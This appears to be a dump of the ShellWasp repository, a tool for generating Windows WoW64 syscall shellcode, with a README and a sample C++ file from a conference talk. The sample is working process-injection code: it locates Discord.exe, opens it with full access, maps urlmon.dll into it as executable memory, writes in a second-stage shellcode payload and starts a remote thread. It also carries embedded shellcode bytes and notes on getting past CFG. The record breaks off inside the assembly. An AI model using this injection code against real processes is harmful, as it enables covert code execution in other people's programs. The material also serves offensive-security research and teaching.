Repository: Bw3ll/ShellWasp Branch: main Commit: 09f69cddfb21 Files: 28 Total size: 2.5 MB Directory structure: gitextract_iepmxh43/ ├── LICENSE ├── README.md ├── Samples/ │ ├── BHMEA _shellcode_injection3.cpp │ ├── alternative_create_process.asm │ ├── alternative_create_process_SHAREM_output.txt │ └── alternative_create_process_tester.c ├── setup.py ├── shellWasp.py └── start/ ├── Syscall Output/ │ └── Win1011_NtAllocateVirtualMemory_NtQuerySystemInformation_NtOpenProcess_20230414_143422.txt ├── WinDbgList.txt ├── WinSysCalls.json ├── __init__.py ├── config.cfg ├── convertSyscallsToReverse.py ├── myKeys.py ├── parseconf.py ├── reverseWinSyscalls.json ├── reverseWinSyscallsInt.json ├── shellWasp.py ├── singleton/ │ ├── __init__.py │ └── helpers.py ├── syscallAIHelper.py ├── syscallAiPrompts.py ├── syscallPossibleValues.py ├── syscall_parser_toJson.py ├── syscall_signatures.json ├── syscall_signatures.py └── ui.py ================================================ FILE CONTENTS ================================================ ================================================ FILE: LICENSE ================================================ MIT License Copyright (c) 2022 Bramwell Brizendine Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: README.md ================================================ # ShellWasp 2.1 ShellWasp is a the original tool to faciliate creating shellcode utilizing syscalls. ShellWasp helps build templates for 32-bit WoW64 shellcode that uses Windows syscalls while avoiding the portability problem that comes with hardcoded SSNs across OS builds. ShellWasp was first released at DEF CON 30 in August 2022. Since then it has expanded considerably. Version 2.0 added alternative ways to discover OSBuild, including User_Shared_Data and PEB via r12, along with three new ways to invoke the syscall through WoW64: one for Windows 7 and two for Windows 10/11. With ShellWasp 2.1, we have added new capabilities to get sample, illustrative values for function parameters - both from a pre-computed, offline mode and generated on the fly from AI (if an OpenAI key is provided). There are plans for additional new features in the coming months. There will be other maintenance updates coming soon as well. ## Presentations and Background The primary resource on using Windows syscalls in shellcode can be found in the most recent, definitive conference presentation, from HITB Amsterdam 2023 page for further details, including full-length, hour long video, detailed slides, to learn more about this project: https://conference.hitb.org/hitbsecconf2023ams/session/windows-syscalls-in-shellcode-advanced-techniques-for-malicious-functionality/ Slides are available for download at HITB. This project has evolved tremendously since its initial debut at [DEFCON 30](https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Tarek%20Abdelmotaleb%20%20%20Dr.%20Bramwell%20Brizendine%20-%20Weaponizing%20Windows%20Syscalls%20as%20Modern%2032-bit%20Shellcode.pdf). ShellWasp was also presented as part of a Black Hat MEA briefing in 2022, and slides and white paper are available within the GitHub repository. Both the Black Hat and DEF CON presentations were superceded by the Hack in the Box Amsterdam 2023 presetnation, which contains significanlty more new content and several novel features for ShellWasp ## What ShellWasp Does ShellWasp is a way to help perform syscalls in WoW64 shellcode, and the latest version features multiple, novel methods of invoking the syscall in a WoW64 environment, as detailed in the HITB Amsterstam 2023 talk. ShellWasp automates building templates of syscall shellcode. The template is intended to be just that - a template. The user still needs to determine what parameter values to use and how to build any required structures. The goal is to make handcrafted syscall shellcode more manageable, especially when multiple syscalls are involved. Nearly all user-mode syscalls supported, including all the ones I could find function prototypes for. ShellWasp also solves the syscall portability problem for syscalls. It identifies the OS build, and ShellWasp creates a syscall arrray in response to user input, allowing the current syscall values (SSNs) to be found at runtime, rather than having to be hardcoded, which can limit how you can use them across OS builds. ShellWasp takes care of managing the syscall array, so if a syscall is used multiple times, there will only be one entry in the syscall array. Thus, ShellWasp will allows syscall values (SSNs) to be obtained dynamically. If you are building complex syscall shellcode with multiple syscalls being used (not for the faint-hearted), and you want to make sure there is no common way of invoking it, such as fs:0xc0, then these new additions may be of interest. Though for simplicity's sake, I recommend beginning with the "simpler" way of invoking it, via fs:0xc0. The shellcode size created by ShellWasp is relatively small in size. Users can select the OS builds to support, and it is recommend to use perhaps just some of the most recent ones from Windows 7/10/11, rather than every possible one. This can help keep size more manageable. Additionall, the way in which syscalls are called differs from Windows 7 and Windows 10/11. ShellWasp will automatically take care of that based on the selections the user makes. We have created syscall shellcode that works across all three OS, using our technique. To achieve a more compact shellcode size, ShellWasp utilizes precomputed syscall tables in JSON format, as opposed to dynamic SSN resolution techniques, which may lengthen the shellcode. This allows us to keep the shellcode size minimal. ShellWasp supports nearly all user-mode syscalls for which I could find function prototypes. It identifies the OS build and creates a syscall array based on user input, allowing the current SSNs to be found at runtime rather than hardcoded. If a syscall is used multiple times, ShellWasp manages that for you so there is only one entry in the syscall array. ## Scope ShellWasp is geared toward 32-bit WoW64 shellcode. It is not meant as a replacement for SysWhispers2, FreshyCalls, or related work. This is a different direction for utilizing Windows syscalls and is focused on shellcode specifically. The point is not just how to recover the SSN. The point is helping facilitate syscall shellcode in a compact and reliable form. ## Why ShellWasp May Be Useful If you are building more complex syscall shellcode and do not want to rely only on a common mechanism such as fs:0xc0, the novel WoW64 invocation methods provided by ShellWasp may be useful. That said, for simplicity's sake, I still recommend beginning with the simpler approach via fs:0xc0, before moving onto more advanced techniques. ShellWasp is most useful when you want portability across supported Windows releases, compact output, and a cleaner way to manage repeated syscall use in one piece of shellcode. ShellWasp 2.0 includes some alternative ways to discover the OSBuild. ShellWasp 2.0 additionally provides three new ways to invoke the syscall from WoW64, all without syscall, int 0x2e or fs:0xc0 - two for Windows 10/11 and one for Windows 7. These two new methods have not been seen before (see below images). ShellWasp is not an alternative to SysWhispers2/3 or the work of ElephantSe4l, with Freshycalls, etc. This is a different direction for utilizing Windows syscalls. The method of determing OS build or the SSN is not important. (ShellWasp provides a few ways to determine this.) ShellWasp is about helping faciliate syscall shellcode in a compact and reliable form. ## Optional 2.1 Parameter Support (New) ShellWasp 2.1 adds the ability to generate sample, illustrative parameter values. These can come either from a precomputed offline mode or, if an OpenAI key is provided, through AI-assisted generation. These are intended as learning aids and starting points, not as finished parameter choices. ShellWasp does not build end-to-end shellcode, but helps you start the process. This can be rather useful, as it might expose some necessary values that might not be easily found. ## Using ShellWasp The assembly generated by ShellWasp is relatively compact. Users can select the OS builds to support and the syscalls to include. It is usually not necessary to target every supported build. In many cases, selecting only the releases you care about will help keep the resulting shellcode size more manageable. Be realistic - if this is being done for offensive security purposes, is it really necessary to target every os build? It is certainly an option if payload size is not a consideration. The Assembly generated by ShellWasp is intended to be more compact in size. Additionally, as many people have automatic Windows update, it may be desirable to select only more recent OS builds, rather than every possible one, and this helps reduce size as well. Users can easily and quickly rearrange syscalls in shellcode. ShellWasp takes care of much of the bookkeeping, but you still need to supply the parameter values and build out any required structures. For hints and tips, use the pre-computed illustrative samples or generate something on the fly with an AI key. Though keep in mind - these are just starting points, which may or may not be appropriate for your project. Working to build syscall shellcode is an iterative process requiring trial and error. A reminder: ShellWasp only supports Windows 7/10/11 at the moment, as a desing choice. It is easy to select desired Windows releases via config file or UI. Changes can also be saved to the to config. ## Quick Start Download the repository and run it from the command line: `py shellWasp.py` You can also use `python shellWasp.py` if that is how Python is configured on your system. Desired settings for selected OS builds and Windows syscalls can be added to the config file or changed in the UI. Those settings can also be saved back to the config. ## Installation A setup file is provided to help ensure the needed libraries are installed: `py setup.py install` You may substitute `python` for `py` as needed. This installs the required libraries, including `colorama` and `keystone-engine`. Keystone is used to assemble the generated code so the assembly can be validated. ShellWasp is still intended to produce a template whose parameters need to be customized, so the generated bytes are not the main focus of the tool. If you do not want to use `setup.py`, you can install the dependencies manually: `pip install keystone-engine` `pip install colorama` ![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/shellwasp1.png?raw=true) ![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/shellwasp3.png?raw=true) ![image](https://user-images.githubusercontent.com/49998815/201258739-bc8e4f11-d737-4a1f-a8e5-7f827f701717.png) Note: You select the OS builds to target--it is not necessary to target every single build--and you select the syscalls to use. The above is just a random illustration. ShellWasp takes care of a lot of the details, but you still need to build out the parameters and required structures. ![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/osbuild3.png?raw=true) ![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/fsyscall.png.png?raw=true) ![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/osbuild2.png?raw=true) ![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/multWays.png?raw=true) ![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/alt_invoke.png?raw=true) ![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/altinvoke2.png?raw=true) ## Repository Layout * `shellWasp.py` - small launcher for the tool * `start/shellWasp.py` - main implementation * `start/config.cfg` - configuration for OS builds and syscall choices * `start/ui.py` - UI support * `start/WinSysCalls.json` and related files - syscall tables and related data * `Samples/` - example files * `BH Slides-White paper/` - slides and white paper material ## Updates * March 2026 update: ShellWasp 2.1 has a major usability upgrade to produce clearer and more realistic parameter generation. It can now produce richer illustrative syscall parameters, with optional structure-aware examples and field-level structure expansions where helpful. These are intended as learning aids. I also added chunked processing and automatic aggregation for larger batches of syscalls while preserving call order and supporting repeated uses of the same export in a single run. To make longer sessions easier to manage, ShellWasp now supports a continuously updated working results file, resume capability, and both timestamped JSON snapshots and cleaned-up text exports for review and reuse. More changes are coming. * April 19, 2023 - ShellWasp 2.0 is released with masssive changes, including alternative ways to identify to the OSBuild, and three previously undocumented ways to invoke the syscall via WoW64 (one for Windows 7 and two for Windows 10/11). * On Nov. 1, 2022, support was added for Windows 10 22H2 and Windows 11 22H2. These are the newest Windows releases. Note: we do not support Insider preview builds nor Server. * On Nov. 1, 2022, the mechanism by which the pointer to the syscall array is preserved has been changed. In testing shellcode with chains of several Windows syscalls, some stability issues were noted with values on the stack. In order to avoid those issues, it was decided to change the stack cleanup (`add esp, 0xXX`) and `pop edi`, to `mov edi, [esp+0xYY]` - YY being the number of bytes that would have been "cleaned" from the stack. The `push edi` that follows is retained. ShellWasp maintains a pointer to the syscall array at edi, and since the actual syscall itself destroys the value contained in edi, there needs to be a way to restore it, after the return from the far jump to kernel-mode. It was felt this new Assembly would be a more stable way to accomplish this. Of course, another option could be to have a pointer to the syscall array stored at some location on ebp or other memory, and then that could be used to restore EDI. That would in some ways be simpler, as it would be possible to avoiding needing to count the number of bytes to go back. However, it was felt that `mov edi, [esp+0xYY]` would be safer for novices. If it was stored elsewhere in memory at a fixed location, such as the stack, it could be possible to accidentally overwrite it. Both approaches take minimal time and effort. ## Correction Please note that previous public comments I made regarding sorting by address techniques no longer working were incorrect. I apologize for the error. Keep in mind this tool is geared for WoW64, 32-bit shellcode, not as a replacement for other syscall techniques. Our efforts remain in that WoW64 realm. ## License This project is released under the terms of the MIT license. ================================================ FILE: Samples/BHMEA _shellcode_injection3.cpp ================================================ // Author: Dr. Bramwell Brizendine // Event: Black Hat Middle East and Africa in Riyadh, KSA // This uses the ShellWasp technique for syscall shellcode // ShellWasp - for Syscall Shellcode: https://github.com/Bw3ll/ShellWasp // This inline Assembly can allow the syscall shellcode to be tested (and edited) simply. // I will release it in shellcode form at a little time--I have some additional minor cleanup to do. // The pure shellcode (non-inline Assembly) one I have has some minor stability issues before I can release it. // Description on compiling and using with Developer prompt discussed later. #include #include #include #include #include using namespace std; int main() { // I do not actually use this for the second stage payload. See below with _emit keywords. unsigned char myShell[] = "\x90\x90\x90\x90\x31\xc9\xf7\xe1\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd5\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x68\x6c\x6c\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x33\x32\x2e\x64\x68\x55\x73\x65\x72\x54\xff\xd0\x68\x6f\x78\x41\x61\x66\x83\x6c\x24\x03\x61\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd5\x83\xc4\x10\x31\xd2\x31\xc9\x52\x68\x50\x77\x6e\x64\x89\xe7\x52\x68\x59\x65\x73\x73\x89\xe1\x52\x57\x51\x52\xff\xd0\x83\xc4\x10\x68\x65\x73\x73\x61\x66\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd5\x31\xc9\x51\xff\xd0"; void* mem2 = malloc(0x1060); memcpy(&mem2, &myShell, sizeof(myShell)); // This syscall shellcode (inlineAssembly version) // ; ShellWasp - for Syscall Shellcode: https://github.com/Bw3ll/ShellWasp // ; // ; Note: This is proof-of-concept, just to demonstrate what is possible with syscall shellcode. // ; It utilizes the ShellWasp approach to syscall shellcode, with a syscall array having been created // ; by it. This syscall shellcode works for Windows 7 and 10/11. Note that with Windows 10/11, CFG will // ; cause the the second stage shellcode - a messagebox - to immediately terminate. It does, however, // ; succeed in the sense that all syscalls work. An additional syscall to NtSetInformationVirtualMemory // ; could create a CFG exception. I had success with the corresponding WinAPI function, // ; SetProcessValidCallTargets (that is not included). Either one creates a CFG exception that can allow // ; for the process injection to succeed in spite of CFG. // ; The goal here is to avoid using WinAPI functions, so that is not included. // ; Another reader can implement theNtSetInformationVirtualMemory. // ; With Windows 7, there is no CFG, and it works without issue. // ; // ; The goal of this shellcode is to enumerate all active processes, find Discord and determine its // ; PID,and then to create a library, Urlmon.dll, which is then used to inject a second stage payload. // ; The originalprocess then must activate the second stage shellcode, which is present in Discord.exe. // ; In order to do this, the shellcode loads urlmon.dll into the target process and gives it RWX. It // ; then copies the second stage payload over into our unneeded urlmon.dll, 0x3000 bytes from the start. // ; The shellcode then begins to execude the second stage shellcode. // ; If someone wanted to, they could substitute Discord for test.exe or any non-CFG process on Win10/11, for // ; testing purposes. CFG does not exist on Win7. // ; The syscalls utilized follow: // ; 1. NtAllocateVirtualMemory // ; 2. NtQuerySystemInformation // ; 3. NtOpenProcess // ; 4. NtCreateFile // ; 5. NtCreateSection // ; 6. NtMapViewofSection // ; 7. NtProtectVirtualMemory // ; 8. NtWriteVirtualMemory // ; 9. NtCreateThreadEx // ; 10. NtWaitForSingleObject (optional - not needed for Discord) // ; // ; With inline Assembly, I typically use Sublime to write and then Developer prompt to compile. // ; The syntax for compiling with Developer Prompt is as follows: // ; cl filename.cpp // ; // ; Please note also that one reason I use inline Assembly is the ability to use int 3, which is very // ; helpful when debugging in WinDbg. This is a breakpoint. If you do not wish to use those, you will // ; want to comment those out! A program with int 3 can only be run inside a debugger - otherwise it errors // ; out. Thus, if using this outside a debugger, the int 3's should be commented out!! __asm { jmp start ourSyscall: ; Syscall Function cmp dword ptr [edi-0x4],0xa jne win7 win10: ; Windows 10/11 Syscall call dword ptr fs:[0xc0] ret win7: ; Windows 7 Syscall xor ecx, ecx lea edx, [esp+4] call dword ptr fs:[0xc0] add esp, 4 ret start: int 3 ; breakpoint - remove if outside of debugger mov eax, fs:[0x30] mov ebx, [eax+0xac] mov eax, [eax+0xa4] mov ecx, esp sub esp, 0x1000 cmp bl, 0x64 ; 21H2, Win10 release jl less1 push 0x18 ; NtAllocateVirtualMemory push 0x36 ; NtQuerySystemInformation push 0x26 ; NtOpenProcess push 0x55 ; NtCreateFile push 0x4a ; NtCreateSection push 0x28 ; NtMapViewOfSection push 0x50 ; NtProtectVirtualMemory push 0x3a ; NtWriteVirtualMemory push 0xc1 ; NtCreateThreadEx push 0xd0004 ; NtWaitForSingleObject jmp saveSyscallArray less1: cmp bl, 0x63 ; 21H1, Win10 release jl less2 push 0x18 ; NtAllocateVirtualMemory push 0x36 ; NtQuerySystemInformation push 0x26 ; NtOpenProcess push 0x55 ; NtCreateFile push 0x4a ; NtCreateSection push 0x28 ; NtMapViewOfSection push 0x50 ; NtProtectVirtualMemory push 0x3a ; NtWriteVirtualMemory push 0xc1 ; NtCreateThreadEx push 0xd0004 ; NtWaitForSingleObject jmp saveSyscallArray less2: cmp bl, 0xF0 ; 21H2, Win11 release jl less3 push 0x18 ; NtAllocateVirtualMemory push 0x36 ; NtQuerySystemInformation push 0x26 ; NtOpenProcess push 0x55 ; NtCreateFile push 0x4a ; NtCreateSection push 0x28 ; NtMapViewOfSection push 0x50 ; NtProtectVirtualMemory push 0x3a ; NtWriteVirtualMemory push 0xc5 ; NtCreateThreadEx push 0xd0004 ; NtWaitForSingleObject jmp saveSyscallArray less3: cmp bl, 0xB1 ; Win7, Sp1 release jl end2 push 0x15 ; NtAllocateVirtualMemory push 0x33 ; NtQuerySystemInformation push 0x23 ; NtOpenProcess push 0x52 ; NtCreateFile push 0x47 ; NtCreateSection push 0x25 ; NtMapViewOfSection push 0x4d ; NtProtectVirtualMemory push 0x37 ; NtWriteVirtualMemory push 0xa5 ; NtCreateThreadEx push 0x1 ; NtWaitForSingleObject saveSyscallArray: push eax mov edi, esp add edi, 0x4 mov esp, ecx int 3 ; breakpoint - remove if outside of debugger xor ecx, ecx mov [ebp-0x20], ecx mov [ebp-0x30], ecx mov dword ptr[ebp - 0x18], 0x600000 ; 0x30000 restart: push edi push 0x40 // ; ULONG Protect push 0x3000 // ; ULONG AllocationType lea ebx, dword ptr[ebp - 0x18] push ebx // ; PSIZE_T RegionSize xor ecx, ecx push ecx // ; ULONG_PTR ZeroBits mov dword ptr[ebp - 0x280], 0 lea ebx, dword ptr[ebp - 0x280] push ebx // ; PVOID *BaseAddress push -1 // ; HANDLE ProcessHandle mov eax, [edi+0x24] ; NtAllocateVirtualMemory syscall int 3 ; breakpoint - remove if outside of debugger call ourSyscall mov edi, [esp+0x18] push edi lea ecx, dword ptr [ebp-0x20] push ecx ; PULONecxG ReturnLength mov ecx, dword ptr [ebp-0x18] push ecx ; ULONG SystemInformationLength mov ecx, dword ptr[ebp - 0x280] push ecx ; PVOID SystemInformation push 0x00000005 ; SYSTEM_INFORMATION_CLASS SystemInformationClass -> 0x05 SystemProcessInformation mov eax, [edi+0x20] ; NtQuerySystemInformation syscall int 3 ; breakpoint - remove if outside of debugger call ourSyscall mov edi, [esp+0x10] push edi mov ecx, dword ptr [ebp-0x20] mov dword ptr[ebp - 0x18], ecx mov dword ptr [ebp-0x266], esp cmp eax, 0xC0000004 je restart mov esp, dword ptr [ebp-0x266] xor edx, edx ; Discord.exe push edx mov dx, 0x65 push dx mov dx, 0x78 push dx mov dx, 0x65 push dx mov dx, 0x2e push dx mov dx, 0x64 push dx mov dx, 0x72 push dx mov dx, 0x6f push dx mov dx, 0x63 push dx mov dx, 0x73 push dx mov dx, 0x69 push dx mov dx, 0x44 push dx // xor edx, edx ; test.exe ; if test.exe, must change sizes in repe cmpsb string comparison // push edx // mov dx, 0x65 // push dx // mov dx, 0x78 // push dx // mov dx, 0x65 // push dx // mov dx, 0x2e // push dx // mov dx, 0x74 // push dx // mov dx, 0x73 // push dx // mov dx, 0x65 // push dx // mov dx, 0x74 // push dx // // int 3 mov dword ptr [ebp-0xdd], esp xor edx, edx push edx ; SecurityQualityOfService push edx ; SecurityDescriptor push edx ; Attributes push edx ; ObjectName push edx ; RootDirectory push 0x00000018 ; Length mov [ebp-0xfe], esp ; _OBJECT_ATTRIBUTES ; the searching is borrowed from the presentation Tarek and I did at DEF CON 30-- so that credit goes to Tarek. enumerateProcesses: mov eax, dword ptr[ebp-0x280] // start of SystemInformation structure, with all processes cmp eax, 0 ; check to see if reached end je finishedProcesses mov ebx, dword ptr[ebp - 0x280] mov esi, dword ptr[ebx+0x3c] ; dereferencing the location for unicode string text for process name cmp esi, 0 je nextProc mov edi, dword ptr[ebp-0xdd] // Source mov ecx, 8 // int 3 cld repe cmpsb ; check for match for target process jecxz match nextProc: add eax, dword ptr[eax] ; no match - add the size of current entry to enumerate next process mov dword ptr[ebp-0x280], eax ; save current process jmp enumerateProcesses finishedProcesses: match: mov edi, [esp+0x32] push edi xor ecx, ecx push ecx ; uniquethread push dword ptr[ebp-0x280] ; uniqueprocess mov [ebp-0x1ff], esp ; ptr to ClientId mov ecx, esp mov eax, dword ptr[ebx+0x44] //pid mov dword ptr[ecx], eax xor edx, edx push edx mov dword ptr [ebp-0xbe], esp ; ProcessHandle mov ecx, [ebp-0x1ff] push ecx ; PCLIENT_ID ClientId mov ecx, [ebp-0xfe] push ecx ; POBJECT_ATTRIBUTES ObjectAttributes push 0x1FFFFF ; ACCESS_MASK AccessMask PROCESS_ALL_ACCESS mov ecx, [ebp-0xbe] push ecx ; PHANDLE ProcessHandle int 3 ; breakpoint - remove if outside of debugger mov eax, [edi+0x1c] ; NtOpenProcess syscall call ourSyscall mov edi, [esp+0x1c] ;int 3 push edi ; start ntcreatesection ; create SectionHandle xor edx, edx mov [ebp-0x324], edx ; create ObjectAttributes structure ; todo mov [ebp-0x342], esp ;create PLARGE_INTEGER MaximumSize ; todo ; PLARGE_INTEGER ByteOffset xor ecx, ecx push 0x13C000 ; high part 1294336 -> 0x13C000 push ecx ; low part push 0x50 push ecx ; low part mov [ebp-0x348], esp xor edx, edx push edx mov dx, 0x6c push dx mov dx, 0x6c push dx mov dx, 0x64 push dx mov dx, 0x2e push dx mov dx, 0x6e push dx mov dx, 0x6f push dx mov dx, 0x6d push dx mov dx, 0x6c push dx mov dx, 0x72 push dx mov dx, 0x75 push dx mov dx, 0x5c push dx mov dx, 0x34 push dx mov dx, 0x36 push dx mov dx, 0x57 push dx mov dx, 0x4f push dx mov dx, 0x57 push dx mov dx, 0x73 push dx mov dx, 0x79 push dx mov dx, 0x53 push dx mov dx, 0x5c push dx mov dx, 0x73 push dx mov dx, 0x77 push dx mov dx, 0x6f push dx mov dx, 0x64 push dx mov dx, 0x6e push dx mov dx, 0x69 push dx mov dx, 0x57 push dx mov dx, 0x5c push dx mov dx, 0x3a push dx mov dx, 0x63 push dx mov dx, 0x5c push dx mov dx, 0x3f push dx mov dx, 0x3f push dx mov dx, 0x5c push dx mov [ebp-0x2fd], esp ; int 3 ; UNICODE_STRING REG_PATH xor edx, edx push dword ptr [ebp-0x2fd] ; Buffer mov dx, 70 push dx ; Max Length mov dx, 68 push dx ; Length mov [ebp-0xed], esp ; ; _IO_STATUS_BLOCK xor ecx, ecx push ecx ; ulong_ptr information push ecx ; pvoid pointer reserved push ecx ; ntstatus status mov [ebp-0x48], esp ; out PIO_STATUS_BLOCK IoStatusBlock ; _OBJECT_ATTRIBUTES xor edx, edx xor ecx, ecx push edx ; SecurityQualityOfService = NULL push edx ; SecurityDescriptor = NULL inc ecx shl ecx, 6 push ecx ; Attributes = OBJ_CASE_INSENSITIVE = 0x40 push dword ptr [ebp-0xed] ; UNICODE_STRING push edx ; Root Directory = NULL push 0x18 ; Length mov [ebp-0x24], esp ; OBJECT_ATTR xor ecx, ecx mov [ebp-0x3dd], ecx ; PHANDLE FileHandle mov [ebp-0xee], ecx ; out PIO_STATUS_BLOCK IoStatusBlock ; start ntcreatefile push 0x00000000 ; ULONG EaLength push 0x00000000 ; PVOID EaBuffer push 0x00000860 ; ULONG CreateOptions FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 | FILE_RANDOM_ACCESS 0x00000800 | FILE_NON_DIRECTORY_FILE 0x00000040 push 0x0003 ; ULONG CreateDisposition OPEN_EXISTING = 3 FILE_OVERWRITE_IF 0x00000005 push 0x1 ; ULONG ShareAccess 2 FILE_SHARE_WRITE 1 FILE_SHARE_read push 0x80 ; ULONG FileAttributes 128 0x80 FILE_ATTRIBUTE_NORMAL push 0x00000000 ; PLARGE_INTEGER AllocationSize push dword ptr [ebp-0x48] ; out PIO_STATUS_BLOCK IoStatusBlock push dword ptr [ebp-0x24] ; POBJECT_ATTRIBUTES ObjectAttributes push 0x120089; GENERIC_READ = 120089, ACCESS_MASK DesiredAccess lea ecx, [ebp-0x3dd] push ecx ; PHANDLE FileHandle int 3 ; breakpoint - remove if outside of debugger mov eax, [edi+0x18] ; NtCreateFile syscall call ourSyscall mov edi, [esp+0xb0]; 0x84 + 0x22 = push edi ; start ntcreatesection ; create SectionHandle xor edx, edx mov [ebp-0x324], edx ; create ObjectAttributes structure ; todo mov [ebp-0x342], esp ;create PLARGE_INTEGER MaximumSize ; todo ; PLARGE_INTEGER ByteOffset xor ecx, ecx push 0x13C000 ; high part 1294336 -> 0x13C000 push ecx ; low part push 0x50 push ecx ; low part mov [ebp-0x348], esp mov ecx, [ebp-0x3dd] ; out HANDLE FileHandle not a pointer - handle push ecx ; HANDLE FileHandle push 0x1000000 ; ULONG AllocationAttributes UInt32 SEC_IMAGE = 0x1000000 push 0x00000002 ; ULONG SectionPageProtection / Page Attributes -- UInt32 PAGE_READONLY = 0x02; mov ecx, [ebp-0x348] push 0 ; PLARGE_INTEGER MaximumSize push 0x0 ; POBJECT_ATTRIBUTES ObjectAttributes NULL push 0x10000000 ; ACCESS_MASK DesiredAccess SECTION_ALL_ACCESS = 0x10000000, SECTION_MAP_WRITE | SECTION_MAP_READ | SECTION_MAP_EXECUT lea ecx, [ebp-0x324] push ecx ; PHANDLE SectionHandle int 3 ; breakpoint - remove if outside of debugger mov eax, [edi+0x14] ; NtCreateSection syscall call ourSyscall mov edi, [esp+0x2c] ;ViewSize -> 0 xor ecx, ecx push ecx mov [ebp-0x98], ecx mov [ebp-0x88], ecx retry: push edi push 0x00000040 ; ULONG Protect PAGE_READWRITE 04 / PAGE_READONLY = 0x02 push 0x00000000 ; ULONG AllocationType NULL push 0x00000001 ; DWORD InheritDisposition ViewShare lea ecx, [ebp-0x98] push ecx ; PULONG ViewSize push 0x00000000 ; PLARGE_INTEGER SectionOffset NULL push 0x00000000 ; ULONG CommitSize NULL push 0x00000000 ; ULONG stackZeroBits NULL lea ecx, [ebp-0x88] push ecx ; PVOID *BaseAddress NULL // ; int 3 mov ecx, dword ptr[ebp-0xbe] ; mov ecx, dword ptr [ecx] push ecx ; HANDLE ProcessHandle push dword ptr [ebp-0x324] ; HANDLE SectionHandle int 3 ; breakpoint - remove if outside of debugger mov eax, [edi+0x10] ; NtMapViewOfSection syscall call ourSyscall mov edi, [esp+0x28] ; 0x28 + 0x4 = push edi ;;start NtProtectVirtualMemory xor ecx, ecx push ecx push ecx push ecx push ecx push ecx push 0x0000a12c ; desired size mov [ebp-0x64], esp xor ecx, ecx push ecx push ecx mov [ebp-0x424], esp mov ecx, [ebp-0x424] push ecx ; PULONG OldAccessProtection push 0x00000040 ; ULONG NewAccessProtection mov ecx, [ebp-0x64] push ecx ; PULONG NumberOfBytesToProtect lea ecx, [ebp-0x88] push ecx ; PVOID *BaseAddress mov ecx, dword ptr[ebp-0xbe] ; mov ecx, dword ptr [ecx] push ecx ; HANDLE ProcessHandle int 3 ; breakpoint - remove if outside of debugger // mov eax, 0x4D ; NtProtectVirtualMemory syscall mov eax, [edi+0xc] ; NtProtectVirtualMemory syscall call ourSyscall mov edi, [esp+0x34] ; 0x14 + 20= 34 push edi ;;; start ntwritevirtualmemory push 0 ; PULONG NumberOfBytesWritten push 0x100 ; ULONG NumberOfBytesToWrite ; Note: The inline Assembly (VS) way of doing self-location is a little screwy, so traditional call pop way does not work as easily as it word doing NASM. This is one place where an adjustment is necessary when converting to shellcode lea ecx, ourShell add ecx, 0x4 push ecx ; PVOID Buffer lea ecx, [ebp-0x88] mov edx, dword ptr [ecx] add edx, 0x3000 mov dword ptr [ebp-0x88], edx mov ecx, [ebp-0x88] push ecx ; PVOID BaseAddress mov ecx, dword ptr[ebp-0xbe] mov ecx, dword ptr [ecx] push ecx ; HANDLE ProcessHandle int 3 ; breakpoint - remove if outside of debugger mov eax, [edi+0x8] ; NtWriteVirtualMemory syscall call ourSyscall mov edi, [esp+0x14] push edi xor edx, edx push edx ; NULL pBytesBuffer push edx ; NULL sizeOfStackReserve push edx ; NULL sizeOfStackCommit push edx ; NULL stackZeroBits push edx ; FALSE bCreateSuspsended push edx ; 0 lpParameter mov ebx, dword ptr[ebp - 0x88] push ebx ; pMemoryAllocation StartRoutine mov ecx, dword ptr[ebp-0xbe] ; ProcessHandle mov ecx, dword ptr [ecx] push ecx ; hCurrentProcess push 0 ; pObjectAttributes push 0x1fffff ; PROCESS_ALL_ACCESS; 0x3e0000 desiredACcess = Specific_rights_all + standard_rights_all mov dword ptr[ebp - 0x290], 0 ; hThread lea ecx, dword ptr[ebp - 0x290] ; hThread push ecx ; hThread int 3 ; breakpoint - remove if outside of debugger mov eax, [edi+0x4] ; NtCreateThreadEx syscall call ourSyscall mov edi, [esp+0x2c] push edi push 0 ; PLARGE_INTEGER TimeOut push 1 ; ; BOOLEAN Alertable TRUE push dword ptr[ebp - 0x290] ; HANDLE ObjectHandle int 3 ; breakpoint - remove if outside of debugger mov eax, [edi] ; NtWaitForSingleObject syscall call ourSyscall mov edi, [esp+0xc] push edi int 3 ; 